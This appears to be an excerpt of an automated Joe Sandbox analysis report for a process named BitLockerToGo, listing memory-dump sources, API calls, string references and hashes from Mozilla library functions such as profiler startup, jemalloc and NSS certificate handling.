                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
                                                                                                                                                                                                                                                                                                                    • String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3465160547-3797173233
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ca57b1ac3b6b63511018053b83b75e81fc0e064be3a8e482fb7e88eccbaf4255
                                                                                                                                                                                                                                                                                                                    • Instruction ID: ff04a2d39c9c978e5ac43a39791ed2192ae83ca45a7628ffed6ed5a5366aedb8
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca57b1ac3b6b63511018053b83b75e81fc0e064be3a8e482fb7e88eccbaf4255
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F5204B1E012519BEF118FA4DD057AF7BB4AF09308F184028EC19E7B55E731D99ACB92
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C985492
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9854A8
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9854BE
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C9854DB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AAB3F: EnterCriticalSection.KERNEL32(6C9FE370,?,?,6C973527,6C9FF6CC,?,?,?,?,?,?,?,?,6C973284), ref: 6C9AAB49
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AAB3F: LeaveCriticalSection.KERNEL32(6C9FE370,?,6C973527,6C9FF6CC,?,?,?,?,?,?,?,?,6C973284,?,?,6C9956F6), ref: 6C9AAB7C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9ACBE8: GetCurrentProcess.KERNEL32(?,6C9731A7), ref: 6C9ACBF1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9731A7), ref: 6C9ACBFA
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C9854F9
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C985516
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C98556A
                                                                                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C9FF4B8), ref: 6C985577
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000070), ref: 6C985585
                                                                                                                                                                                                                                                                                                                    • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C985590
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C9855E6
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C9FF4B8), ref: 6C985606
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C985616
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AAB89: EnterCriticalSection.KERNEL32(6C9FE370,?,?,?,6C9734DE,6C9FF6CC,?,?,?,?,?,?,?,6C973284), ref: 6C9AAB94
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AAB89: LeaveCriticalSection.KERNEL32(6C9FE370,?,6C9734DE,6C9FF6CC,?,?,?,?,?,?,?,6C973284,?,?,6C9956F6), ref: 6C9AABD1
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C98563E
                                                                                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C985646
                                                                                                                                                                                                                                                                                                                    • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C98567C
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C9856AE
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C995EDB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995E90: memset.VCRUNTIME140(6C9D7765,000000E5,55CCCCCC), ref: 6C995F27
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995E90: LeaveCriticalSection.KERNEL32(?), ref: 6C995FB2
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C9856E8
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C985707
                                                                                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C98570F
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C985729
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C98574E
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C98576B
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C985796
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C9857B3
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C9857CA
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C98548D
                                                                                                                                                                                                                                                                                                                    • GeckoMain, xrefs: 6C985554, 6C9855D5
                                                                                                                                                                                                                                                                                                                    • - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C985CF9
                                                                                                                                                                                                                                                                                                                    • MOZ_PROFILER_STARTUP, xrefs: 6C9855E1
                                                                                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C9854A3
                                                                                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_HELP, xrefs: 6C985511
                                                                                                                                                                                                                                                                                                                    • MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C9857C5
                                                                                                                                                                                                                                                                                                                    • - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C985D1C
                                                                                                                                                                                                                                                                                                                    • MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C985791
                                                                                                                                                                                                                                                                                                                    • MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C985749
                                                                                                                                                                                                                                                                                                                    • - MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C985D24
                                                                                                                                                                                                                                                                                                                    • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C985AC9
                                                                                                                                                                                                                                                                                                                    • MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C985766
                                                                                                                                                                                                                                                                                                                    • [I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C985B38
                                                                                                                                                                                                                                                                                                                    • [I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C985BBE
                                                                                                                                                                                                                                                                                                                    • MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C9857AE
                                                                                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C9854B9
                                                                                                                                                                                                                                                                                                                    • MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C9856E3
                                                                                                                                                                                                                                                                                                                    • - MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C985D01
                                                                                                                                                                                                                                                                                                                    • [I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C985717
                                                                                                                                                                                                                                                                                                                    • [I %d/%d] profiler_init, xrefs: 6C98564E
                                                                                                                                                                                                                                                                                                                    • - MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C985D2B
                                                                                                                                                                                                                                                                                                                    • [I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C985C56
                                                                                                                                                                                                                                                                                                                    • MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C985724
                                                                                                                                                                                                                                                                                                                    • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C98584E
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
                                                                                                                                                                                                                                                                                                                    • String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
                                                                                                                                                                                                                                                                                                                    • API String ID: 3686969729-1266492768
                                                                                                                                                                                                                                                                                                                    • Opcode ID: df29e8d76ed383bcb5e9dc5938092102f60c3adf406df914df4dd8b358b42f93
                                                                                                                                                                                                                                                                                                                    • Instruction ID: bf8625e436fdec65f52a6e8e293f688b6909c0ac4de301b28583b89e7d01d92d
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df29e8d76ed383bcb5e9dc5938092102f60c3adf406df914df4dd8b358b42f93
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B72216719093409FFB009F74984865AB7F9AFA630CF24492AE86B97B41E731C84DCB53
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C986CCC
                                                                                                                                                                                                                                                                                                                    • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C986D11
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(0000000C), ref: 6C986D26
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C98CA10: malloc.MOZGLUE(?), ref: 6C98CA26
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C986D35
                                                                                                                                                                                                                                                                                                                    • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C986D53
                                                                                                                                                                                                                                                                                                                    • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C986D73
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C986D80
                                                                                                                                                                                                                                                                                                                    • CertGetNameStringW.CRYPT32 ref: 6C986DC0
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000000), ref: 6C986DDC
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C986DEB
                                                                                                                                                                                                                                                                                                                    • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C986DFF
                                                                                                                                                                                                                                                                                                                    • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C986E10
                                                                                                                                                                                                                                                                                                                    • CryptMsgClose.CRYPT32(00000000), ref: 6C986E27
                                                                                                                                                                                                                                                                                                                    • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C986E34
                                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32 ref: 6C986EF9
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000000), ref: 6C986F7D
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C986F8C
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C98709D
                                                                                                                                                                                                                                                                                                                    • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C987103
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C987153
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 6C987176
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C987209
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C98723A
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C98726B
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C98729C
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C9872DC
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C98730D
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C9873C2
                                                                                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C9873F3
                                                                                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C9873FF
                                                                                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C987406
                                                                                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C98740D
                                                                                                                                                                                                                                                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C98741A
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?), ref: 6C98755A
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C987568
                                                                                                                                                                                                                                                                                                                    • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C987585
                                                                                                                                                                                                                                                                                                                    • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C987598
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C9875AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AAB89: EnterCriticalSection.KERNEL32(6C9FE370,?,?,?,6C9734DE,6C9FF6CC,?,?,?,?,?,?,?,6C973284), ref: 6C9AAB94
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AAB89: LeaveCriticalSection.KERNEL32(6C9FE370,?,6C9734DE,6C9FF6CC,?,?,?,?,?,?,?,6C973284,?,?,6C9956F6), ref: 6C9AABD1
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                                                                                                                                                                                                                                    • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                                                                                                                                                                                                                                    • API String ID: 3256780453-3980470659
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 63b8aa72c2bbb1a7f2006dba6f798604c95553a62aa4fdb1611e20ece6463d50
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0c517b6fefc84d7ed5d227baae53d516fa2436b876ad017d4dff96a4da80da51
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63b8aa72c2bbb1a7f2006dba6f798604c95553a62aa4fdb1611e20ece6463d50
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 465202B1A053189BEB21CF24CC84BAA77BCEF55708F104599F919A7640DB70EB85CFA1
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6C9B0F1F
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6C9B0F99
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C9B0FB7
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6C9B0FE9
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C9B1031
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6C9B10D0
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6C9B117D
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000E5,?), ref: 6C9B1C39
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C9FE744), ref: 6C9B3391
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C9FE744), ref: 6C9B33CD
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6C9B3431
                                                                                                                                                                                                                                                                                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9B3437
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C9B37BD
                                                                                                                                                                                                                                                                                                                    • MALLOC_OPTIONS, xrefs: 6C9B35FE
                                                                                                                                                                                                                                                                                                                    • <jemalloc>, xrefs: 6C9B3941, 6C9B39F1
                                                                                                                                                                                                                                                                                                                    • : (malloc) Unsupported character in malloc options: ', xrefs: 6C9B3A02
                                                                                                                                                                                                                                                                                                                    • Compile-time page size does not divide the runtime one., xrefs: 6C9B3946
                                                                                                                                                                                                                                                                                                                    • MOZ_RELEASE_ASSERT(mNode), xrefs: 6C9B3559, 6C9B382D, 6C9B3848
                                                                                                                                                                                                                                                                                                                    • MOZ_CRASH(), xrefs: 6C9B3950
                                                                                                                                                                                                                                                                                                                    • MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C9B3793
                                                                                                                                                                                                                                                                                                                    • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C9B37A8
                                                                                                                                                                                                                                                                                                                    • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C9B37D2
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
                                                                                                                                                                                                                                                                                                                    • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                                                                                                                                                                                    • API String ID: 3040639385-4173974723
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 12c3233e7c4a17476f6e516574b26c61c68e66608b58fed9c0cc290e31f0b69c
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 153f1201138f6da1deb89fc653e4902c8a1fdb8b38952ea007bf59047c458304
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12c3233e7c4a17476f6e516574b26c61c68e66608b58fed9c0cc290e31f0b69c
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8539D71A05B019FC304CF29C540616FBE5FF8A728F29C6ADE869AB791D771E841CB81
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3527
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D355B
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D35BC
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D35E0
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D363A
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3693
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D36CD
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3703
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D373C
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3775
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D378F
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3892
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D38BB
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3902
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3939
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3970
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D39EF
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3A26
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3AE5
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3E85
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3EBA
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D3EE2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9D6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C9D61DD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9D6180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C9D622C
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D40F9
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D412F
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D4157
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9D6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C9D6250
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9D6180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9D6292
                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D441B
